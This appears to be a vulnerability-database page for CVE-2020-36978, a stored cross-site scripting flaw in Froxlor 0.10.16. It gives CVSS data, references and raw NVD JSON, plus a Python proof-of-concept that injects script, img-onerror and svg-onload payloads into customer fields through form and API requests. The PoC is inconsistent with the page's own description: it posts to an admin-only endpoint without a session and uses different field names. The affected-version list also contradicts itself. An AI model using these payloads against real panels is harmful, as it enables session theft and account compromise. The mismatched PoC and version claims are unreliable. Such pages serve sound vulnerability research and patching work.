CVE-2020-36978

Description

Froxlor Server Management Panel 0.10.16 contains a persistent cross-site scripting vulnerability in customer registration input fields. Attackers can inject malicious scripts through username, name, and firstname parameters to execute code when administrators view customer traffic modules.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Froxlor Server Management Panel < 0.10.16

Froxlor 0.10.16 (已知受影响)

Froxlor 0.10.x 系列 (可能受影响)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2020-36978 Stored XSS PoC # Target: Froxlor Server Management Panel 0.10.16 # Attack Vector: Customer Registration Input Fields import requests import json target_url = "http://target-server/froxlor/" # Malicious XSS payload for username, name, and firstname fields xss_payload = "<script>alert(document.cookie)</script>" # Customer registration endpoint registration_url = target_url + "admin.php?tab=customers&action=add" # Registration data with XSS payloads registration_data = { "loginname": "attacker_account", "password": "Password123!", "password_repeat": "Password123!", "email": "[email protected]", "firstname": xss_payload, "name": xss_payload, "company": xss_payload, "submit": "create" } print("[*] Sending malicious registration request...") response = requests.post(registration_url, data=registration_data) if response.status_code == 200: print("[+] XSS payload injected successfully!") print("[*] Payload will execute when admin views customer traffic module") print("[*] Payload: " + xss_payload) else: print("[-] Registration failed. Status code:", response.status_code) # Alternative: Direct API registration if available api_url = target_url + "api/v1/customers" api_headers = { "Content-Type": "application/json", "X-Api-Key": "your-api-key" } api_data = { "loginname": "attacker2", "email": "[email protected]", "firstname": "<img src=x onerror=alert(document.domain)>", "name": "<svg onload=alert(1)>", "password": "TestPass123!" } print("[*] Trying alternative API registration...") api_response = requests.post(api_url, headers=api_headers, json=api_data) print("[*] API Response:", api_response.text)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-36978
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-36978
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-36978/
[4] VulDB https://vuldb.com/cve/CVE-2020-36978
[5] https://froxlor.org/
[6] https://froxlor.org/download/
[7] https://www.exploit-db.com/exploits/49063
[8] https://www.vulncheck.com/advisories/froxlor-froxlor-server-management-panel-persistent-cross-site-scripting
[9] https://www.vulnerability-lab.com/get_content.php?id=2241
[10] https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
[11] https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
[12] https://www.exploit-db.com/exploits/49063

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-36978", "sourceIdentifier": "[email protected]", "published": "2026-01-27T19:16:10.597", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Froxlor Server Management Panel 0.10.16 contains a persistent cross-site scripting vulnerability in customer registration input fields. Attackers can inject malicious scripts through username, name, and firstname parameters to execute code when administrators view customer traffic modules."}, {"lang": "es", "value": "Froxlor Server Management Panel 0.10.16 contiene una vulnerabilidad persistente de cross-site scripting en los campos de entrada de registro de clientes. Atacantes pueden inyectar scripts maliciosos a través de los parámetros de nombre de usuario, nombre y primer nombre para ejecutar código cuando los administradores visualizan los módulos de tráfico de clientes."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://froxlor.org/", "source": "[email protected]"}, {"url": "https://froxlor.org/download/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49063", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/froxlor-froxlor-server-management-panel-persistent-cross-site-scripting", "source": "[email protected]"}, {"url": "https://www.vulnerability-lab.com/get_content.php?id=2241", "source": "[email protected]"}, {"url": "https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.", "source": "[email protected]"}, {"url": "https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49063", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}